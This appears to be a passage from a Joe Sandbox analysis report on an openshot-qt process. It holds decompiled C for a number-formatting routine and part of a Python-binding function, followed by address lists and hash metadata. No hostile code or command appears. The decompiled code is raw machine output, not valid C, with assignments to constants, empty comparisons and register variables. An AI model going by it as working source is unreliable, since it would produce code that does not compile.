                                                                    									__eax =  !=  ? 0 : 4 << __cl;
                                                                    									__esi = __edi;
                                                                    									__edi = __ebp;
                                                                    									__esi = (__ebp << 0x00000020 | __esi) >> 1;
                                                                    									__edi = __ebp >> 1;
                                                                    									__esi = __esi + ( !=  ? 0 : 4 << __cl);
                                                                    									asm("adc edi, edx");
                                                                    									if(__edi < 0) {
                                                                    										_v124 = _v124 + 1;
                                                                    									} else {
                                                                    										__edi = (__edi << 0x00000020 | __esi) << 1;
                                                                    										__esi = __esi + __esi;
                                                                    									}
                                                                    									0xf = 0xf - _v136;
                                                                    									__ebp = 0;
                                                                    									__ecx = 0xf - _v136 << 2;
                                                                    									__esi = (__edi << 0x00000020 | __esi) >> __cl;
                                                                    									__edi = __edi >> __cl;
                                                                    									__ecx = 0x0000000f - _v136 << 0x00000002 & 0x00000020;
                                                                    									__esi =  !=  ? __edi : __esi;
                                                                    									__ebp = __edi;
                                                                    									__edi = __esi;
                                                                    									L51:
                                                                    									__eax =  *(__ebx + 4);
                                                                    									_v128 =  *(__ebx + 4);
                                                                    									L52:
                                                                    									__eax =  &_v52;
                                                                    									_v136 = __ebx;
                                                                    									_v132 = __eax;
                                                                    									__esi = __eax;
                                                                    									__eax = _v128;
                                                                    									__edx = __eax;
                                                                    									__eax = __eax & 0x00000020;
                                                                    									__edx = __edx & 0x00000800;
                                                                    									_v120 = __al;
                                                                    									_v112 = __edx;
                                                                    									__edx = _v124 & 0x0000ffff;
                                                                    									do {
                                                                    										__ecx = __edi;
                                                                    										__eax = __edi;
                                                                    										__ebx = __ebp;
                                                                    										__ecx = __edi & 0xfffffff0;
                                                                    										__eax = __edi & 0x0000000f;
                                                                    										__ebx = __ebp | __edi & 0xfffffff0;
                                                                    										if((__ebp | __edi & 0xfffffff0) == 0) {
                                                                    											if(__esi > _v132) {
                                                                    												L80:
                                                                    												 *__esi = 0x2e;
                                                                    												__esi = __esi + 1;
                                                                    											} else {
                                                                    												__ebx = _v112;
                                                                    												if(_v112 != 0) {
                                                                    													goto L80;
                                                                    												} else {
                                                                    													_v136 =  *((intOrPtr*)(_v136 + 0xc));
                                                                    													if( *((intOrPtr*)(_v136 + 0xc)) > 0) {
                                                                    														goto L80;
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    											__edi = __edi ^ 0x00000001;
                                                                    											_v124 = __edi ^ 0x00000001;
                                                                    											_t166 = __edx - 1; // 0x3ffe
                                                                    											__ecx = _t166;
                                                                    											_v114 = __cx;
                                                                    											_v124 = _v124 | __ebp;
                                                                    											if((_v124 | __ebp) == 0) {
                                                                    												__edi = 0;
                                                                    												__ebp = 0;
                                                                    											} else {
                                                                    												__ecx = _v114 & 0x0000ffff;
                                                                    												_v124 = __esi;
                                                                    												__esi = __eax;
                                                                    												do {
                                                                    													__edi = (__ebp << 0x00000020 | __edi) >> 1;
                                                                    													__ebp = __ebp >> 1;
                                                                    													__edx = __ecx;
                                                                    													__ebx = __edi;
                                                                    													__eax = __ebp;
                                                                    													__ecx = __edx - 1;
                                                                    													__ebx = __edi ^ 0x00000001;
                                                                    													__eax = __ebp | __edi ^ 0x00000001;
                                                                    												} while ((__ebp | __edi ^ 0x00000001) != 0);
                                                                    												__eax = __esi;
                                                                    												__edi = 0;
                                                                    												__esi = _v124;
                                                                    												__ebp = 0;
                                                                    											}
                                                                    										} else {
                                                                    											__ebx = _v136;
                                                                    											__edi = (__ebp << 0x00000020 | __edi) >> 4;
                                                                    											__ebp = __ebp >> 4;
                                                                    											__ecx =  *(__ebx + 0xc);
                                                                    											if(__ecx > 0) {
                                                                    												 *(__ebx + 0xc) = __ecx;
                                                                    											}
                                                                    										}
                                                                    										if(__eax == 0) {
                                                                    											__ecx = 0;
                                                                    											if(__esi > _v132) {
                                                                    												goto L55;
                                                                    											} else {
                                                                    												__eax = _v136;
                                                                    												__ebx =  *(__eax + 0xc);
                                                                    												if( *(__eax + 0xc) >= 0) {
                                                                    													goto L55;
                                                                    												}
                                                                    											}
                                                                    											goto L57;
                                                                    										} else {
                                                                    											__ecx = __eax;
                                                                    											if(__eax <= 9) {
                                                                    												L55:
                                                                    												_t125 = __ecx + 0x30; // 0x30
                                                                    												__eax = _t125;
                                                                    												goto L56;
                                                                    											} else {
                                                                    												__eax = __eax + 0x37;
                                                                    												__al = __al | _v120;
                                                                    												L56:
                                                                    												 *__esi = __al;
                                                                    												__esi = __esi + 1;
                                                                    												goto L57;
                                                                    											}
                                                                    											break;
                                                                    										}
                                                                    										while(1) {
                                                                    											L66:
                                                                    											__eax =  *(__ebx + 0xc);
                                                                    											__edx = __eax - 1;
                                                                    											 *(__ebx + 0xc) = __eax - 1;
                                                                    											if(__eax <= 0) {
                                                                    												goto L67;
                                                                    											}
                                                                    											__edx = __ebx;
                                                                    											0x30 = E003030E0(0x30, __ebx);
                                                                    										}
                                                                    										goto L67;
                                                                    										L57:
                                                                    										__ebp = __ebp | __edi;
                                                                    									} while ((__ebp | __edi) != 0);
                                                                    									_v124 = __dx;
                                                                    									__ebx = _v136;
                                                                    									if(__esi == _v132) {
                                                                    										goto L18;
                                                                    									} else {
                                                                    										__eax =  *(__ebx + 8);
                                                                    										_v120 = __eax;
                                                                    										if(__eax > 0) {
                                                                    											goto L21;
                                                                    										} else {
                                                                    											goto L88;
                                                                    										}
                                                                    									}
                                                                    									goto L103;
                                                                    								} else {
                                                                    									__eax =  *(__ebx + 4);
                                                                    									_v128 =  *(__ebx + 4);
                                                                    									L17:
                                                                    									__eax =  &_v52;
                                                                    									_v132 =  &_v52;
                                                                    									L18:
                                                                    									__edx =  *(__ebx + 0xc);
                                                                    									if( *(__ebx + 0xc) <= 0) {
                                                                    										__eax = _v132;
                                                                    										if((_v128 & 0x00000800) == 0) {
                                                                    											goto L20;
                                                                    										} else {
                                                                    											goto L19;
                                                                    										}
                                                                    										L67:
                                                                    										__eax =  *(__ebx + 4);
                                                                    										__edx = __ebx;
                                                                    										__eax =  *(__ebx + 4) & 0x00000020;
                                                                    										 *(__ebx + 4) & 0x00000020 | 0x00000050 = E003030E0( *(__ebx + 4) & 0x00000020 | 0x00000050, __edx);
                                                                    										__eax = _v136;
                                                                    										 *(__ebx + 8) =  *(__ebx + 8) + __ebp;
                                                                    										 *(__ebx + 4) =  *(__ebx + 4) | 0x000001c0;
                                                                    										asm("cdq");
                                                                    										_v68 = __eax;
                                                                    										_v64 = __edx;
                                                                    										__ecx = __edx;
                                                                    										 *__esp = __eax;
                                                                    										__eax = _v64;
                                                                    										__ecx = __edx >> 0x1f;
                                                                    										_v156 = __ebx;
                                                                    										_v60 = __ecx;
                                                                    										_v56 = __ecx;
                                                                    										_v168 = _v64;
                                                                    										_v164 = __ecx;
                                                                    										_v160 = __ecx;
                                                                    										__eax = E00304190();
                                                                    										__esp =  &(__esp[0x27]);
                                                                    										return __eax;
                                                                    										goto L103;
                                                                    									} else {
                                                                    										L19:
                                                                    										_v52 = 0x2e;
                                                                    										__eax =  &_v51;
                                                                    									}
                                                                    									L20:
                                                                    									 *__eax = 0x30;
                                                                    									__esi = __eax + 1;
                                                                    									__eax =  *(__ebx + 8);
                                                                    									_v120 = __eax;
                                                                    									if(__eax <= 0) {
                                                                    										L88:
                                                                    										__eax = _v124;
                                                                    										__ebp = 2;
                                                                    										_v136 = _v124;
                                                                    										if((_v128 & 0x00000080) == 0) {
                                                                    											goto L29;
                                                                    										} else {
                                                                    											goto L89;
                                                                    										}
                                                                    										goto L103;
                                                                    									} else {
                                                                    										L21:
                                                                    										__edx =  *(__ebx + 0xc);
                                                                    										__eax = __esi;
                                                                    										__eax = __esi - _v132;
                                                                    										__edi = _v124;
                                                                    										__ecx = __eax +  *(__ebx + 0xc);
                                                                    										__edx = _v128;
                                                                    										__eax =  >  ? __eax +  *(__ebx + 0xc) : __eax;
                                                                    										__ecx = 0x66666667;
                                                                    										_v136 = __edi;
                                                                    										__edx = _v128 & 0x000001c0;
                                                                    										asm("sbb eax, 0xfffffffa");
                                                                    										__ebp = __eax;
                                                                    										__eax = __edi;
                                                                    										__edx = __eax * 0x66666667 >> 0x20;
                                                                    										__eax = __eax * 0x66666667;
                                                                    										__eax = __edi;
                                                                    										__edi = __ebp;
                                                                    										__eax = __eax >> 0x1f;
                                                                    										__ecx = (__edx >> 2) - __eax;
                                                                    										if(__ecx == 0) {
                                                                    											__ebp = 2;
                                                                    										} else {
                                                                    											_v124 = __esi;
                                                                    											do {
                                                                    												__eax = 0x66666667;
                                                                    												__edi = __edi + 1;
                                                                    												__edx = 0x66666667 * __ecx >> 0x20;
                                                                    												0x66666667 * __ecx = __ecx;
                                                                    												__esi = __edi + 2;
                                                                    												__eax = __ecx >> 0x1f;
                                                                    												__esi = __edi + 2 - __ebp;
                                                                    												__edx = 0x66666667 * __ecx >> 0x20 >> 2;
                                                                    												__edx = (0x66666667 * __ecx >> 0x20 >> 2) - (__ecx >> 0x1f);
                                                                    												__ecx = __edx;
                                                                    											} while (__edx != 0);
                                                                    											__ebp = __si;
                                                                    											__esi = _v124;
                                                                    										}
                                                                    										__eax = _v120;
                                                                    										if(__eax <= __edi) {
                                                                    											 *(__ebx + 8) = 0xffffffff;
                                                                    										} else {
                                                                    											__eax = __eax - __edi;
                                                                    											if((_v128 & 0x00000600) == 0) {
                                                                    												__edx = __eax - 1;
                                                                    												 *(__ebx + 8) = __eax - 1;
                                                                    												if(__eax > 0) {
                                                                    													do {
                                                                    														__edx = __ebx;
                                                                    														0x20 = E003030E0(0x20, __ebx);
                                                                    														__eax =  *(__ebx + 8);
                                                                    														__edx = __eax - 1;
                                                                    														 *(__ebx + 8) = __eax - 1;
                                                                    													} while (__eax > 0);
                                                                    													__eax =  *(__ebx + 4);
                                                                    													_v128 =  *(__ebx + 4);
                                                                    												}
                                                                    											} else {
                                                                    												 *(__ebx + 8) = __eax;
                                                                    											}
                                                                    										}
                                                                    										if((_v128 & 0x00000080) != 0) {
                                                                    											L89:
                                                                    											__edx = __ebx;
                                                                    											0x2d = E003030E0(0x2d, __ebx);
                                                                    										} else {
                                                                    											L29:
                                                                    											if((_v128 & 0x00000100) != 0) {
                                                                    												__edx = __ebx;
                                                                    												0x2b = E003030E0(0x2b, __ebx);
                                                                    											} else {
                                                                    												if((_v128 & 0x00000040) != 0) {
                                                                    													__edx = __ebx;
                                                                    													0x20 = E003030E0(0x20, __ebx);
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						__edx = __ebx;
                                                                    						0x30 = E003030E0(0x30, __ebx);
                                                                    						__eax =  *(__ebx + 4);
                                                                    						__edx = __ebx;
                                                                    						__eax =  *(__ebx + 4) & 0x00000020;
                                                                    						 *(__ebx + 4) & 0x00000020 | 0x00000058 = E003030E0( *(__ebx + 4) & 0x00000020 | 0x00000058, __ebx);
                                                                    						__eax =  *(__ebx + 8);
                                                                    						if(__eax > 0 && ( *(__ebx + 5) & 0x00000002) != 0) {
                                                                    							 *(__ebx + 8) = __eax;
                                                                    							do {
                                                                    								__edx = __ebx;
                                                                    								0x30 = E003030E0(0x30, __ebx);
                                                                    								__eax =  *(__ebx + 8);
                                                                    								__edx = __eax - 1;
                                                                    								 *(__ebx + 8) = __eax - 1;
                                                                    							} while (__eax > 0);
                                                                    						}
                                                                    						__edi = _v132;
                                                                    						if(__esi > _v132) {
                                                                    							do {
                                                                    								__eax =  *(__esi - 1);
                                                                    								__esi = __esi - 1;
                                                                    								if(__eax == 0x2e) {
                                                                    									__ebx = E00303350(__ebx);
                                                                    								} else {
                                                                    									if(__eax == 0x2c) {
                                                                    										__eax =  *(__ebx + 0x1c) & 0x0000ffff;
                                                                    										_v68 = __ax;
                                                                    										if(__ax != 0) {
                                                                    											__ecx = __ebx;
                                                                    											__edx = 1;
                                                                    											 &_v68 = E00303560( &_v68, __ebx, 1);
                                                                    										}
                                                                    									} else {
                                                                    										__edx = __ebx;
                                                                    										__eax = E003030E0(__eax, __ebx);
                                                                    									}
                                                                    								}
                                                                    							} while (__esi != __edi);
                                                                    						} else {
                                                                    						}
                                                                    						goto L66;
                                                                    					}
                                                                    				}
                                                                    				L103:
                                                                    			}









































                                                                    0x003048c4
                                                                    0x003048c6
                                                                    0x003048cc
                                                                    0x003048d3
                                                                    0x003048d5
                                                                    0x003048d6
                                                                    0x003048d8
                                                                    0x003048e0
                                                                    0x00304c20
                                                                    0x00304c22
                                                                    0x00304c28
                                                                    0x00304c2a
                                                                    0x00304c2f
                                                                    0x00304c32
                                                                    0x00304c33
                                                                    0x00304c34
                                                                    0x00000000
                                                                    0x003048e6
                                                                    0x003048e6
                                                                    0x003048e8
                                                                    0x003048ec
                                                                    0x003048f4
                                                                    0x00304ae0
                                                                    0x00304ae0
                                                                    0x003048fa
                                                                    0x003048fc
                                                                    0x003048fd
                                                                    0x003048ff
                                                                    0x00304907
                                                                    0x00304e10
                                                                    0x00304e12
                                                                    0x00304e18
                                                                    0x00304e1a
                                                                    0x00304e1c
                                                                    0x00304e21
                                                                    0x00304e22
                                                                    0x00304e27
                                                                    0x00304e28
                                                                    0x00304e29
                                                                    0x003032c0
                                                                    0x003032c1
                                                                    0x003032c4
                                                                    0x003032cb
                                                                    0x003032d2
                                                                    0x003032d7
                                                                    0x0030331b
                                                                    0x00303333
                                                                    0x00303348
                                                                    0x0030334c
                                                                    0x00303335
                                                                    0x00303335
                                                                    0x0030333a
                                                                    0x0030333e
                                                                    0x0030333e
                                                                    0x0030331d
                                                                    0x0030331d
                                                                    0x00303322
                                                                    0x00303326
                                                                    0x00303326
                                                                    0x003032d9
                                                                    0x003032d9
                                                                    0x003032de
                                                                    0x003032e2
                                                                    0x003032e2
                                                                    0x003032e6
                                                                    0x003032e9
                                                                    0x003032e9
                                                                    0x003032eb
                                                                    0x003032f4
                                                                    0x003032f7
                                                                    0x003032fd
                                                                    0x00000000
                                                                    0x003032ff
                                                                    0x00303314
                                                                    0x00303314
                                                                    0x0030490d
                                                                    0x0030490d
                                                                    0x00304912
                                                                    0x00304916
                                                                    0x0030491a
                                                                    0x0030491e
                                                                    0x00304923
                                                                    0x00304af0
                                                                    0x00304af3
                                                                    0x00304afa
                                                                    0x00304b01
                                                                    0x00000000
                                                                    0x00304b03
                                                                    0x00304b03
                                                                    0x00304b08
                                                                    0x00304b0a
                                                                    0x00304b0e
                                                                    0x00000000
                                                                    0x00304b10
                                                                    0x00000000
                                                                    0x00304b10
                                                                    0x00304b0e
                                                                    0x00000000
                                                                    0x00304929
                                                                    0x0030492b
                                                                    0x0030492d
                                                                    0x00304cba
                                                                    0x00304ec9
                                                                    0x00304ece
                                                                    0x00304cc0
                                                                    0x00304cc0
                                                                    0x00304cc8
                                                                    0x00304cc8
                                                                    0x00304ccc
                                                                    0x00304cce
                                                                    0x00304cd0
                                                                    0x00304cd3
                                                                    0x00304cd7
                                                                    0x00304cd7
                                                                    0x00304cdc
                                                                    0x00304cdf
                                                                    0x00304ce6
                                                                    0x00000000
                                                                    0x00304cec
                                                                    0x00000000
                                                                    0x00304cec
                                                                    0x00000000
                                                                    0x00304933
                                                                    0x00304933
                                                                    0x00304936
                                                                    0x0030493d
                                                                    0x00304b18
                                                                    0x00304b18
                                                                    0x00304b1c
                                                                    0x00304b1e
                                                                    0x00304b20
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00304b22
                                                                    0x00304b27
                                                                    0x00304b2b
                                                                    0x00304b30
                                                                    0x00304b32
                                                                    0x00304b35
                                                                    0x00304b37
                                                                    0x00304b3a
                                                                    0x00304b3f
                                                                    0x00304b42
                                                                    0x00304b45
                                                                    0x00304b47
                                                                    0x00304b49
                                                                    0x00304b4d
                                                                    0x00304b4f
                                                                    0x00304b51
                                                                    0x00304b55
                                                                    0x00304cf8
                                                                    0x00304b5b
                                                                    0x00304b5b
                                                                    0x00304b5f
                                                                    0x00304b5f
                                                                    0x00304b66
                                                                    0x00304b6a
                                                                    0x00304b6c
                                                                    0x00304b6f
                                                                    0x00304b72
                                                                    0x00304b74
                                                                    0x00304b77
                                                                    0x00304b7d
                                                                    0x00304b7f
                                                                    0x00304b81
                                                                    0x00304b81
                                                                    0x00304b84
                                                                    0x00304b88
                                                                    0x00304b88
                                                                    0x00304b8c
                                                                    0x00304b90
                                                                    0x00304b94
                                                                    0x00304b96
                                                                    0x00304b9a
                                                                    0x00304b9c
                                                                    0x00304b9f
                                                                    0x00304ba5
                                                                    0x00304ba9
                                                                    0x00304bad
                                                                    0x00304bdd
                                                                    0x00304bdd
                                                                    0x00304bdf
                                                                    0x00304be1
                                                                    0x00304be3
                                                                    0x00304be6
                                                                    0x00304be9
                                                                    0x00304beb
                                                                    0x00304d1c
                                                                    0x00304d38
                                                                    0x00304d38
                                                                    0x00304d3b
                                                                    0x00304d1e
                                                                    0x00304d1e
                                                                    0x00304d24
                                                                    0x00000000
                                                                    0x00304d26
                                                                    0x00304d2a
                                                                    0x00304d2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00304d2f
                                                                    0x00304d24
                                                                    0x00304d40
                                                                    0x00304d43
                                                                    0x00304d47
                                                                    0x00304d47
                                                                    0x00304d4a
                                                                    0x00304d53
                                                                    0x00304d55
                                                                    0x00304e98
                                                                    0x00304e9a
                                                                    0x00304d5b
                                                                    0x00304d5b
                                                                    0x00304d60
                                                                    0x00304d64
                                                                    0x00304d70
                                                                    0x00304d70
                                                                    0x00304d74
                                                                    0x00304d76
                                                                    0x00304d78
                                                                    0x00304d7a
                                                                    0x00304d7c
                                                                    0x00304d7f
                                                                    0x00304d82
                                                                    0x00304d82
                                                                    0x00304d86
                                                                    0x00304d88
                                                                    0x00304d8a
                                                                    0x00304d8e
                                                                    0x00304d8e
                                                                    0x00304bf1
                                                                    0x00304bf1
                                                                    0x00304bf5
                                                                    0x00304bf9
                                                                    0x00304bfc
                                                                    0x00304c01
                                                                    0x00304c06
                                                                    0x00304c06
                                                                    0x00304c01
                                                                    0x00304c0b
                                                                    0x00304bb8
                                                                    0x00304bbe
                                                                    0x00000000
                                                                    0x00304bc0
                                                                    0x00304bc0
                                                                    0x00304bc4
                                                                    0x00304bc9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00304bc9
                                                                    0x00000000
                                                                    0x00304c0d
                                                                    0x00304c0d
                                                                    0x00304c12
                                                                    0x00304bcb
                                                                    0x00304bcb
                                                                    0x00304bcb
                                                                    0x00000000
                                                                    0x00304c14
                                                                    0x00304c14
                                                                    0x00304c17
                                                                    0x00304bce
                                                                    0x00304bce
                                                                    0x00304bd0
                                                                    0x00000000
                                                                    0x00304bd0
                                                                    0x00000000
                                                                    0x00304c12
                                                                    0x00304c4c
                                                                    0x00304c4c
                                                                    0x00304c4c
                                                                    0x00304c4f
                                                                    0x00304c52
                                                                    0x00304c57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00304c40
                                                                    0x00304c47
                                                                    0x00304c47
                                                                    0x00000000
                                                                    0x00304bd3
                                                                    0x00304bd5
                                                                    0x00304bd5
                                                                    0x00304db0
                                                                    0x00304db5
                                                                    0x00304dbd
                                                                    0x00000000
                                                                    0x00304dc3
                                                                    0x00304dc3
                                                                    0x00304dc6
                                                                    0x00304dcc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00304dcc
                                                                    0x00000000
                                                                    0x00304943
                                                                    0x00304943
                                                                    0x00304946
                                                                    0x0030494a
                                                                    0x0030494a
                                                                    0x0030494e
                                                                    0x00304952
                                                                    0x00304952
                                                                    0x00304957
                                                                    0x00304ea8
                                                                    0x00304eb4
                                                                    0x00000000
                                                                    0x00304eba
                                                                    0x00000000
                                                                    0x00304eba
                                                                    0x00304c59
                                                                    0x00304c59
                                                                    0x00304c5c
                                                                    0x00304c5e
                                                                    0x00304c64
                                                                    0x00304c69
                                                                    0x00304c6d
                                                                    0x00304c70
                                                                    0x00304c77
                                                                    0x00304c78
                                                                    0x00304c7c
                                                                    0x00304c80
                                                                    0x00304c82
                                                                    0x00304c85
                                                                    0x00304c89
                                                                    0x00304c8c
                                                                    0x00304c90
                                                                    0x00304c94
                                                                    0x00304c98
                                                                    0x00304c9c
                                                                    0x00304ca0
                                                                    0x00304ca4
                                                                    0x00304ca9
                                                                    0x00304cb3
                                                                    0x00000000
                                                                    0x0030495d
                                                                    0x0030495d
                                                                    0x0030495d
                                                                    0x00304962
                                                                    0x00304962
                                                                    0x00304966
                                                                    0x00304966
                                                                    0x00304969
                                                                    0x0030496c
                                                                    0x0030496f
                                                                    0x00304975
                                                                    0x00304dd2
                                                                    0x00304dd2
                                                                    0x00304dd7
                                                                    0x00304ddc
                                                                    0x00304de5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030497b
                                                                    0x0030497b
                                                                    0x0030497b
                                                                    0x0030497e
                                                                    0x00304980
                                                                    0x00304984
                                                                    0x0030498b
                                                                    0x0030498e
                                                                    0x00304992
                                                                    0x00304995
                                                                    0x0030499a
                                                                    0x0030499e
                                                                    0x003049a7
                                                                    0x003049aa
                                                                    0x003049ac
                                                                    0x003049ae
                                                                    0x003049ae
                                                                    0x003049b0
                                                                    0x003049b2
                                                                    0x003049b4
                                                                    0x003049bc
                                                                    0x003049be
                                                                    0x00304ebf
                                                                    0x003049c4
                                                                    0x003049c4
                                                                    0x003049d0
                                                                    0x003049d0
                                                                    0x003049d5
                                                                    0x003049d8
                                                                    0x003049da
                                                                    0x003049dc
                                                                    0x003049df
                                                                    0x003049e2
                                                                    0x003049e4
                                                                    0x003049e7
                                                                    0x003049e9
                                                                    0x003049e9
                                                                    0x003049ed
                                                                    0x003049f0
                                                                    0x003049f0
                                                                    0x003049f4
                                                                    0x003049fa
                                                                    0x00304e00
                                                                    0x00304a00
                                                                    0x00304a00
                                                                    0x00304a0a
                                                                    0x00304e60
                                                                    0x00304e63
                                                                    0x00304e68
                                                                    0x00304e70
                                                                    0x00304e70
                                                                    0x00304e77
                                                                    0x00304e7c
                                                                    0x00304e7f
                                                                    0x00304e82
                                                                    0x00304e85
                                                                    0x00304e89
                                                                    0x00304e8c
                                                                    0x00304e8c
                                                                    0x00304a10
                                                                    0x00304a10
                                                                    0x00304a10
                                                                    0x00304a0a
                                                                    0x00304a18
                                                                    0x00304deb
                                                                    0x00304deb
                                                                    0x00304df2
                                                                    0x00304a1e
                                                                    0x00304a1e
                                                                    0x00304a26
                                                                    0x00304e30
                                                                    0x00304e37
                                                                    0x00304a2c
                                                                    0x00304a31
                                                                    0x00304e48
                                                                    0x00304e4f
                                                                    0x00304e4f
                                                                    0x00304a31
                                                                    0x00304a26
                                                                    0x00304a18
                                                                    0x00304975
                                                                    0x0030493d
                                                                    0x0030492d
                                                                    0x00304a37
                                                                    0x00304a3e
                                                                    0x00304a43
                                                                    0x00304a46
                                                                    0x00304a48
                                                                    0x00304a4e
                                                                    0x00304a53
                                                                    0x00304a58
                                                                    0x00304a63
                                                                    0x00304a70
                                                                    0x00304a70
                                                                    0x00304a77
                                                                    0x00304a7c
                                                                    0x00304a7f
                                                                    0x00304a82
                                                                    0x00304a85
                                                                    0x00304a70
                                                                    0x00304a89
                                                                    0x00304a91
                                                                    0x00304aba
                                                                    0x00304aba
                                                                    0x00304abe
                                                                    0x00304ac4
                                                                    0x00304d0a
                                                                    0x00304aca
                                                                    0x00304acd
                                                                    0x00304aa0
                                                                    0x00304aa4
                                                                    0x00304aac
                                                                    0x00304d98
                                                                    0x00304d9a
                                                                    0x00304da3
                                                                    0x00304da3
                                                                    0x00304acf
                                                                    0x00304acf
                                                                    0x00304ad1
                                                                    0x00304ad1
                                                                    0x00304acd
                                                                    0x00304ab2
                                                                    0x00000000
                                                                    0x00304a93
                                                                    0x00000000
                                                                    0x00304a91
                                                                    0x00304907
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$@$Inf$NaN$gfff$gfff
                                                                    • API String ID: 0-3155045678
                                                                    • Opcode ID: e3875c943d6b2976e53d75d05a42ea3a88795a90acd1f8c105c23840557f9124
                                                                    • Instruction ID: 2edead0dfb80eb0704818a35d38502fb34981dbe72e233034174bd648e210849
                                                                    • Opcode Fuzzy Hash: e3875c943d6b2976e53d75d05a42ea3a88795a90acd1f8c105c23840557f9124
                                                                    • Instruction Fuzzy Hash: CBF1E4B170A3018BD715DE29C4A431BB7E1BF88304F198A6DEA999B385E771DE41CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e54bcc83619da3625459a9fe31b2fb1e4a7eb7e4e6138107212ebe09f29d6f4e
                                                                    • Instruction ID: a1bd4dca12309ef36b09f37a33b6898ee662d3d5e1cf70e1165e8917fc5efcdd
                                                                    • Opcode Fuzzy Hash: e54bcc83619da3625459a9fe31b2fb1e4a7eb7e4e6138107212ebe09f29d6f4e
                                                                    • Instruction Fuzzy Hash: C8F14A35E00209CFDB54DFA9C848B9DBBF3BF48344F198559E425AF2A5DBB0A945CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0a
                                                                    • API String ID: 0-2427073830
                                                                    • Opcode ID: 5ce84d0ac0efc67d8eca958af810fce053595205db7dd3149432cbd8cdeccdc7
                                                                    • Instruction ID: 99ff2c95b0a2baf652a38874c0197342a4512c42f6f98ccbb3d1ef8c0e0c632c
                                                                    • Opcode Fuzzy Hash: 5ce84d0ac0efc67d8eca958af810fce053595205db7dd3149432cbd8cdeccdc7
                                                                    • Instruction Fuzzy Hash: 4EA17E32E002198FCF45DFA5C94459EBBB3FF85305B19866AE805BB261EB71A945CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.530304518.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_6fd0000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8f8f2b1094304fa744979829fef8c672bccfb5b1df125143973481e9cb2dc252
                                                                    • Instruction ID: e1d081bb0e48b01922aac3d4ef3a9100951b66d1f9d59e912f72cab4d890d520
                                                                    • Opcode Fuzzy Hash: 8f8f2b1094304fa744979829fef8c672bccfb5b1df125143973481e9cb2dc252
                                                                    • Instruction Fuzzy Hash: 145225B2510B06CFE711CF1AECC869A7BA1FB41318B948319D6617B6E0D3B4658ECF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E00301A90(char* __eax) {
                                                                    				char* _v16;
                                                                    				char* _v20;
                                                                    				void* _v24;
                                                                    				char* _v32;
                                                                    				char* _v36;
                                                                    				char* _v40;
                                                                    				intOrPtr* _t48;
                                                                    				intOrPtr* _t49;
                                                                    				char _t50;
                                                                    				char* _t51;
                                                                    				char* _t62;
                                                                    				char _t65;
                                                                    				char _t71;
                                                                    				char* _t72;
                                                                    				char* _t73;
                                                                    				char* _t74;
                                                                    				char* _t75;
                                                                    				char* _t85;
                                                                    				char* _t86;
                                                                    				char* _t87;
                                                                    				char _t88;
                                                                    				char** _t89;
                                                                    
                                                                    				_t89 =  &_v32;
                                                                    				_t85 =  &_v16;
                                                                    				_t86 =  &_v20;
                                                                    				_t72 =  &_v24;
                                                                    				_v36 = _t85;
                                                                    				_v40 = _t86;
                                                                    				 *_t89 = _t72;
                                                                    				L003020B0();
                                                                    				_v36 = _t85;
                                                                    				_v40 = _t86;
                                                                    				 *_t89 = _t72;
                                                                    				L003020A8();
                                                                    				 *_t89 = 3;
                                                                    				L00302058();
                                                                    				if(__eax == 0) {
                                                                    					return E00301600(_v20, "Cannot create args tuple.");
                                                                    				}
                                                                    				_t73 = __eax;
                                                                    				_t48 = _v24;
                                                                    				if(_t48 == 0) {
                                                                    					_t49 = __imp___Py_NoneStruct;
                                                                    					 *_t49 =  *_t49 + 1;
